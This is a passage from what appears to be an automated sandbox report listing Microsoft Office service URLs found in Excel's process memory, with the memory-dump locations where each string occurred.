    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com=
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comv
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
    Source: EXCEL.EXE, 00000000.00000003.756085438.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576719662.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504427495.000000000F935000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesoD
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aiBearer
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.ai~
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comV
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://directory.services.
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/$
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1n
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1EnrichmentWACUrlhttps://enrichment.osi.
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/EnrichmentMetadataUrlhttps://enrichm
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonD
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlEnrichmentDisambiguat
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlm
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/om
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/y
